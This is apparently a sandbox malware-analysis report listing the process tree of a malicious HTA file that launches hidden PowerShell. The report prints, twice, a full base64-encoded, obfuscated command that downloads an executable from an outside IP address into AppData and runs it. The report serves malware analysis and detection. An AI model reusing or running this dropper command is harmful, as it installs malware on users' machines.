popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\TiWorker.hta.html

    2260

    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2260 CREDAT:145409

      2388

      • cmd.exe "C:\Windows\system32\cmd.exe" "/c powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g "

        2128

        • powershell.exe powerSHeLL.eXE -Ex BypaSS -nOP -w HIDden -Ec IAAgACAAIAAgACAAIAAgAFsATgBFAFQALgBTAEUAUgB2AGkAQwBFAFAAbwBJAE4AdABtAGEAbgBhAGcAZQBSAF0AOgA6AFMARQBDAHUAUgBpAFQAeQBQAFIAbwB0AE8AYwBPAEwAIAAgACAAIAAgACAAPQAgAAkACQAJAAkACQBbAE4ARQB0AC4AUwBlAEMAdQBSAGkAdAB5AFAAUgBvAHQATwBjAG8ATAB0AHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgAAkAOwAgAAkAIAAgACAACQAJAAkAIAAJAAkACQAJAAkACQAgACAAVwBHAEUAVAAgAAkACQAJACAAKABbAGMAaABhAFIAXQAgAAkAMQAwADQAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkAMQAxADYAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkAMQAxADIAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANQA4ACAACQAgAAkAKwAgAAkAWwBDAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAGEAcgBdACAACQA0ADcAIAAJACAACQArACAACQBbAGMAaABBAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOAAgAAkAIAAJACsAIAAJAFsAQwBoAGEAUgBdACAACQA1ADEAIAAJACAACQArACAACQBbAEMASABBAHIAXQAgAAkANAA2ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g "

          2588

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf